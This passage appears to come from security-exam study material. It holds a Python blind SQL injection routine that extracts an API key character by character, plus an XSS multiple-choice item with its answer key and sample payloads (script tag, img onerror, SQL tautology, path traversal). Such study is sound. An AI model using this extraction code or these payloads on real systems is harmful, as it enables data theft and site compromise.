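    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_api_key(oracle, max_len: int = 16) -> str:
    """Recover users.api_key one character at a time using only the boolean oracle.

    Each probe is the benign id plus a condition on one character of the secret.
    In a time-based attack the condition would instead be wrapped in a delay,
    e.g. MySQL: 1 AND IF(substr(...)='k', SLEEP(2), 0), and `oracle` would
    return whether the response took longer than the baseline.
    """
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = f"1 AND substr((SELECT api_key FROM users WHERE id=1),{pos},1)='{ch}'"
            if oracle(probe):
                secret += ch
                break
        else:
            break   # no character matched: end of the string
    return secret
```

The parameterized version is not "filtering": the whole string is bound as the value of id, the condition is never parsed as SQL, and the extraction loop gets nothing back. That is also why tools such as SQLMap (questions 157 and 166) automate exactly this loop, with binary search over the character set and per-request timing when the only signal is delay.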

172 · MCQ · hard

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?

A. Set the User-Agent to: <img src=x onerror=alert(1)>
B. Set the User-Agent to: ' OR '1'='1
C. Set the User-Agent to: <script>alert('XSS')</script>
D. Set the User-Agent to: ../../../../etc/passwd
Answer: C

This payload will execute JavaScript if the User-Agent is reflected unsanitized, proving the vulnerability.

Why this answer

A script tag that calls alert, such as <script>alert('XSS')</script>, is the standard single-request proof of concept for reflected XSS: if the header is echoed into the HTML body without encoding, the response pops the dialog. Option A (<img src=x onerror=alert(1)>) also executes JavaScript in one request and is the usual fallback when <script> is filtered or the value lands inside an existing tag; the exam keys C as the canonical payload. Options B and D probe for SQL injection and path traversal, not XSS.
